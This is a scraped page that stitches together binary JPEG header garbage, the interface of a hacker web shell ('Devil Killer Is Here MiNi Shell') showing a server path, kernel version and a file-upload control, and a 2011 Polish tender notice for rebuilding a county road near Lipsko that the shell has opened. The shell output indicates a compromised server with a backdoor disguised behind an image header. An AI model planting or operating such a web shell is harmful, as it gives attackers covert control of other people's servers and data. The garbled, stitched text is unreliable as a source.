JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110207/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20110207/42575-N-2011.html

<p class="kh_header"><b>Lipsko: Przebudowa - modernizacja drogi powiatowej nr 1905W Leszczyny - Lipsko na odcinku Huta - Lipsko, dł. 8,480 km. I etap Ratyniec - Lipsko w km 6+550 - 11+330, dł. 4,780 km z segregacją ruchu i zapewnieniem bezpieczeństwa niechronionym uczestnikom ruchu.</b><br>
<b>Numer ogłoszenia: 42575 - 2011; data zamieszczenia: 07.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Zarząd Dróg Publicznych w Lipsku , ul. Spacerowa 24, 27-300 Lipsko, woj. mazowieckie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pzdpl.republika.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa - modernizacja drogi powiatowej nr 1905W Leszczyny - Lipsko na odcinku Huta - Lipsko, dł. 8,480 km. I etap Ratyniec - Lipsko w km 6+550 - 11+330, dł. 4,780 km z segregacją ruchu i zapewnieniem bezpieczeństwa niechronionym uczestnikom ruchu..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia dotyczy przebudowy - modernizacji drogi powiatowej nr 1905W Leszczyny - Lipsko na odcinku Huta - Lipsko, dł. 8,480 km. I etap Ratyniec - Lipsko w km 6+550 - 11+330, dł. 4,780 km z segregacją ruchu i zapewnieniem bezpieczeństwa niechronionym uczestnikom ruchu.
Zakres robót:
I. Roboty przygotowawcze 1. Roboty pomiarowe przy robotach ziemnych dla trasy drogi w terenie równinnym - 4,780 km 2. Mechaniczne ścięcie drzew i karczowanie pni - 34 szt. 3. Mechaniczne karczowanie krzewów. Krzaki o podszyciu średniej gęstości powierzchni - 0,05 ha 4. Rozebranie nawierzchni z betonu (na zjazdach do posesji). Mechaniczne rozebranie nawierzchni z betonu o grubości 15 cm - 72,0 m2 5. Rozebranie nawierzchni z kostki brukowej betonowej, kostka regularna na podsypce cementowo-piaskowej, sposób rozbiórki ręczny - 65,0 m2 6. Rozebranie nawierzchni z płyt betonowych. Nawierzchnia z płyt drogowych betonowych grubość płyt 15 cm, spoiny wypełnione zaprawą cementową - 27,0 m2 7. Rozebranie nawierzchni z płyt betonowych, grubości 12 cm, spoiny wypełnione piaskiem - 21,0 m2 8. Rozebranie nawierzchni chodników z płyt betonowych o wymiarach 35x35x5 cm, na podsypce piaskowej - 3,0 m2 9. Rozebranie nawierzchni chodników z płyt betonowych o wymiarach 50x50x7 cm na podsypce piaskowej - 8,0 m2 10. Rozebranie krawężników betonowych o wymiarach 15x30x100 cm na podsypce cementowo-piaskowej - 344,0 m 11. Rozebranie przepustów rurowych pod zjazdami z rur betonowych o średnicy O 40 cm - 10,0 m 12. Rozebranie przepustów rurowych pod zjazdami z rur betonowych o średnicy O  50 cm - 12,0 m  13. Rozebranie przepustów rurowych pod zjazdami z rur betonowych o średnicy O 60 cm - 9,0 m 14. Rozebranie przepustów prostokątnych z betonu pod zjazdami o wymiarach 50x100 cm - 32,0 m 15. Rozebranie przepustów prostokątnych z betonu pod zjazdami o wymiarach 60x100 cm - 25,0 m 16. Rozebranie nawierzchni z płyt żelbetowych pełnych o wymiarach 3.0x1.0 m, gr.15 cm ułożonych na zjeździe - 9,0 m2 17. Rozebranie przepustów rurowych pod zjazdami. Rura metalowa o średnicy O 50 cm - 9,0 m 18. Rozebranie ogrodzeń. Ogrodzenia z siatki w ramkach z kątownikami - 10,0 m 19. Rozebranie ogrodzeń. Ogrodzenia z siatki na linkach - 2,0 m 20. Rozebranie konstrukcji betonowych ław i fundamentów ogrodzenia o grubości 30 cm i wysokości do 50 cm przy rozbiórce całkowitej - 1,2 m3 
II. Roboty ziemne. 21. Roboty ziemne wykonane koparkami przedsiębiernymi w ziemi uprzednio zmagazynowanej w hałdach z transportem urobku samochodami samowyładowczymi na odl. do 1 km. Koparka o pojemności łyżki 0.25 m3 kat. gruntu III - 681,0 m3 22.Wykopy jamiste, wykonane na odkład koparkami przedsiębiernymi, koparka o poj. łyżki  0,25 m3, gł. wykopu do 3,0 m, kat. gruntu III (wykopy pod studnie rewizyjne - chłonne) - 57,0 m3 23. Mechaniczne rozplantowanie terenu (miejsca składowania ziemi) spycharkami gąsienicowymi o mocy 74 (100) kW (KM), kategoria gruntu III - 681,0 m3 24. Zasypanie-obsypanie wykopów obiektowych (studzienek rewizyjnych - chłonnych) spycharkami z zagęszczeniem ubijakami mechanicznymi, kat. gruntu III - 29,0 m3 
III. Odwodnienie korpusu drogowego. 25. Wykonanie części przelotowej prefabrykowanych przepustów drogowych jednootworowych z rur o średnicy O 60 cm na ławie z pospółki lub kruszywa łamanego - 10,0 m 26.Wykonanie obudowy betonowej wlotu i wylotu prefabrykowanych przepustów drogowych rurowych o średnicy O 60 cm projektowanych - 1,92 m3 27. Wykonanie obudowy betonowej wlotu i wylotu prefabrykowanych przepustów drogowych rurowych istniejących - 10,74 m3 28.Wykonanie studzienki ściekowej z gotowych elementów. Studzienka ściekowa uliczna betonowa o średnicy 500 mm z osadnikiem i syfonem - 1 szt. 29.Wykonanie kanału z rur kanalizacyjnych PVC łączonych na wcisk o średnicy zewnętrznej 250 mm - 23,0 m 30. Wykonanie obudowy kanału - kolektora z rur PCV O 250 mm z betonu B-15 - 2 szt. 31. Wykonanie studzienki ściekowej z gotowych elementów. Studzienka ściekowa uliczna betonowa o średnicy 500 mm bez osadnika i syfonu osadzona nad przepustem - 1 szt. 32. Wykonanie studni rewizyjnej - chłonnej z kręgów betonowych w gotowym wykopie. Studnie z kręgów betonowych o średnicy 1000 mm, o głębokości do 3 m - 3 szt. 33. Ścieki z elementów betonowych wykonane na podsypce cementowo-piaskowej, gr. prefabrykatów 15 cm - 187,0 m 34. Wykonanie utwardzenia pobocza na długości łuków i projektowanego ścieku płytami betonowymi - 71,0 m2 35. Ustawienie krawężników betonowych wraz z wykonaniem ław. Krawężnik betonowy (wtopiony) o wymiarach 15x30x100 cm wraz z wykonaniem ław z betonu B-10 na podsypce piaskowej - 187,0 m 36. Ustawienie obrzeża betonowego zabezpieczającego płytę betonową ściekową od zewnątrz. Obrzeże o wymiarach 30x8 cm na podsypce piaskowej, spoiny wypełnione zaprawą cementową - 187,0 m 
IV. Podbudowy. 37.Koryta wykonane na całej szerokości jezdni. Koryta wykonane mechanicznie głębokości 40 cm, kategoria gruntu III przy użyciu koparki i walca wibracyjnego - 774,0 m2 38. Koryta wykonane na całej szerokości chodnika. Koryta wykonane mechanicznie głębokości 10 cm, kategoria gruntu III przy użyciu koparki i walca wibracyjnego - 1026,0 m 39. Koryta wykonane na poszerzeniach jezdni. Głębokość koryta 40 cm, kat. gruntu III - 1717,0 m2 40. Warstwa odcinająca z piasku. Wykonanie i zagęszczenie warstwy mechaniczne, grubość warstwy po zagęszczeniu 15 cm - 2491,0 m2 41. Warstwa odcinająca z piasku. Wykonanie i zagęszczenie warstwy mechaniczne, grubość warstwy po  zagęszczeniu 10 cm - 1026,0 m2 42. Wykonanie podbudowy z kruszyw łamanych. Warstwa kruszywa łamanego dolna, grubość warstwy po zagęszczeniu 15 cm (wyk. na zatokach, zjazdach i na poszerzeniach) - 2491,0 m2 43. Wykonanie podbudowy z kruszyw łamanych. Warstwa kruszywa łamanego górna, grubość warstwy po zagęszczeniu 10 cm (wyk. na zatokach, zjazdach i na poszerzeniach)  - 2491,0 m2 44. Wyrównanie istniejącej podbudowy- nawierzchni tłuczniem lub innym kruszywem łamanym, sposób zagęszczenia mechaniczny, grubość warstwy do 10 cm - 547,0 m3 
V. Nawierzchnie. 45. Wykonanie nawierzchni z mieszanek mineralno bitumicznych. Warstwa wiążąca z mieszanek min. bit. asfaltowych standard III, grubość warstwy po zagęszczeniu 4 cm. Transport mieszanki samochodami samowyładowczymi na odległość 5 km - 27 341,0 m2 46. Wykonanie nawierzchni z mieszanek mineralno-bitumicznych. Warstwa ścieralna z mieszanek min. bit. asfaltowych standard  III, grubość warstwy po zagęszczeniu 4 cm - 26 955,0 m2 
VI. Roboty wykończeniowe  47.Umocnienie dna rowów elementami prefabrykowanymi (korytkami żelbetowymi). Osadzenie elementów na podsypce cementowo-piaskowej - 30,0 m 48.Umocnienie skarp płytami chodnikowymi 50x50x7cm na podsypce cementowo-piaskowej -30,0m2 49.Wykonanie przepustów pod zjazdami z rur betonowych o średnicy O 50 cm na ławie betonowej ze ściankami czołowymi - 171,0 m 50.Oczyszczenie przepustów z namułu o średnicy O 60 cm, grubość namułu do 50%  - 10,0 m 51. Oczyszczenie przepustów z namułu lecz o średnicy O 2x80 cm, grubość namułu do 50%  - 20,0 m 52. Oczyszczenie przepustów z namułu, lecz o średnicy O 125 cm, grubość namułu do 50%   - 10,0 m 53. Wykopy oraz przekopy wykonane na odkład koparkami przedsiębiernymi. Koparka o pojemności łyżki 0.25-0.60 m3, głębokość wykopu do 3.0 m, kategoria gruntu III-IV  - 2208,0 m3 54. Roboty ziemne wykonane koparkami przedsiębiernymi w ziemi uprzednio zmagazynowanej w hałdach z transportem urobku samochodami samowyładowczymi na 1 km. Koparka o pojemności łyżki 0.25m3, kat. gruntu III - 713,0 m3 55. Ręczne formowanie nasypów (poboczy) sposób dostarczenia ziemi z odkładu, kategoria gruntu III-IV  - 1154,0 m3              56. Ręczne formowanie nasypów (poboczy). Sposób dostarczenia ziemi samochodami samowyład., kat. gruntu III-IV  - 342,0 m3 57. Mechaniczne rozplantowanie terenu (miejsca składowania nadmiaru ziemi) spycharkami gąsienicowymi o mocy 74 (100) KW (KM), kategoria gruntu III  - 713,0 m3 
VII. Urządzenia bezpieczeństwa ruchu. 58. Oznakowanie poziome jezdni farbą chlorokauczukową odblaskową linii krawędziowej przerywanej, malowanie ręczne - 5,40 m2 59. Oznakowanie poziome jezdni farbą chlorokauczukową odblaskową, linie na skrzyżowaniach i przejściach dla pieszych, sposób malowania mechaniczny - 32,0 m2 60. Ustawienie znaków drogowych ostrzegawczych o powierzchni ponad 0.3 m2 na słupkach z rur stalowych O 50 mm - 10 szt. 61. Ustawienie znaków drogowych informacyjnych o powierzchni do 0.3 m2 foliowane na słupkach z rur stalowych  O 50  - 4 szt. 62. Bariery ochronne stalowe (ocynkowane). Bariery jednostronne o masie 1m barier 39 kg - 710,0 m 63. Zakończenie barier  - 40,0 m VIII. Elementy ulic 64. Krawężniki betonowe bez ław wtopione o wymiarach 12x25 cm na podsypce cementowo-piaskowej - 50 m 65. Krawężniki betonowe wraz z wykonaniem ław. Krawężnik betonowy wystający o wymiarach 15x30x100 cm, rodzaj ławy betonowa B-7.5 na podsypce cementowo-piaskowej - 40,0 m 66. Krawężniki betonowe wraz z wykonaniem ław. Krawężniki betonowe wystające o wymiarach 20x30x100 cm, rodzaj ławy betonowa B-10 z oporem na podsypce cementowo-piaskowej - 522,0 m 67. Krawężniki betonowe wraz z wykonaniem ław. Krawężnik betonowy (wtopiony) o wymiarach 20x30x100 cm wraz z wykonaniem ław z betonu B-7.5 na podsypce cementowo-piaskowej - 178,0 m  68. Chodnik z kostki brukowej betonowej, kostka brukowa betonowa grubości 6 cm kolorowa układana na podsypce cementowo-piaskowej - 1044,0 m2 69. Ustawienie obrzeży betonowych o wymiarach 20x6 cm na podsypce piaskowej, spoiny wypełnione zaprawą cementową - 566,0 m 70. Nawierzchnia z kostki brukowej betonowej Kostka brukowa betonowa szara o grubości 8 cm układana na podsypce cementowo-piaskowej spoiny wypełnione piaskiem - 465,0 m2 71.Wykonanie opaski jezdni na zatoce autobusowej - 40,0 m2.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2, 45.11.12.00-0, 45.11.26.00-1, 45.22.11.00-3, 45.23.31.00-0, 45.23.31.00-2, 45.23.31.21-4, 45.23.31.42-6, 45.23.32.53-7, 45.23.32.80-5, 45.23.33.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium.  
Ustala się wadium dla przedmiotu zamówienia w wysokości:  35 000,00 zł, słownie:  trzydzieści pięć tysięcy złotych 00/100</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę realizacji co najmniej  dwóch robót budowlanych okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie. Wymienione roboty w swoim zakresie rzeczowym muszą zawierać budowę lub przebudowę drogi o łącznej długości 4 km. Ogólna wartość każdej z wykonanych robót nie może być mniejsza niż  1 500 000 złotych, z podaniem ich rodzaju i wartości, daty, miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę
W zakresie dysponowanie odpowiednim potencjałem technicznym w zakresie następującego sprzętu i urządzeń spełniających minimalne wymagania sprzętowe i ilościowe:   - zamiatarka mechaniczna (szerokość robocza 150 cm wyposażona w dodatkową szczotkę boczną) - 1 szt.
 - równiarka drogowa (moc silnika 160 KM, szerokość lemiesza 360 cm, wyposażona dodatkowo w zrywak) - 1 szt.   
- koparka podsiębierna (pojemność łyżki powyżej 0,3 m3) - 1 szt.
- rozkładarka mas bitumicznych (sterowana elektronicznie, szer. układania 5,5 m) - 1 szt. 
- samochód samowyładowczy (ładowność 6 ton) - 4 szt. 
- walec stalowy gładki- wibracyjny (masa własna 9 ton, szerokość robocza 1,5 m, bębny dwudzielne) - 1 szt. 
- walec gumowy statyczny (masa operacyjna 8,5 ton, szerokość robocza 1,5 m centralne pompowanie kół) - 1 szt. 
- skrapiarka do asfaltu - 1 szt. 
- wytwórnia mas bitumicznych o wydajności roboczej min. 30 Mg/h - 1 szt.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami, Wykonawca wykaże, że dysponuje lub będzie dysponował: 
1. Kierownikiem Budowy: - minimum 5 letnie doświadczenie zawodowe w pełnieniu funkcji kierownika budowy, - posiada uprawnienia budowlane (wymagane prawem budowlanym) do kierowania robotami w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniejszych obowiązujących przepisów ,- wpis na listę członków właściwej izby samorządu zawodowego potwierdzony zaświadczeniem wydanym przez tę izbę z określonym terminem ważności. 
2. Kierownikiem robót drogowych: - minimum 3 letnie doświadczenie zawodowe przy realizacji robót drogowych, -  posiada uprawnienia budowlane (wymagane prawem budowlanym) do kierowania robotami w specjalności drogowej lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie wcześniejszych obowiązujących przepisów, - wpis na listę członków właściwej izby samorządu zawodowego potwierdzony zaświadczeniem wydanym przez tę izbę z określonym terminem ważności.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest wykazanie przez Wykonawcę -spełnianie następujących warunków:      1. Posiada opłaconą polisę ubezpieczeniową lub inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę ubezpieczenia nie niższą niż 
1 mln. PLN
2.  Posiada środki finansowe lub zdolność kredytową w wysokości nie mniejszej niż 1,5 mln. PLN</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
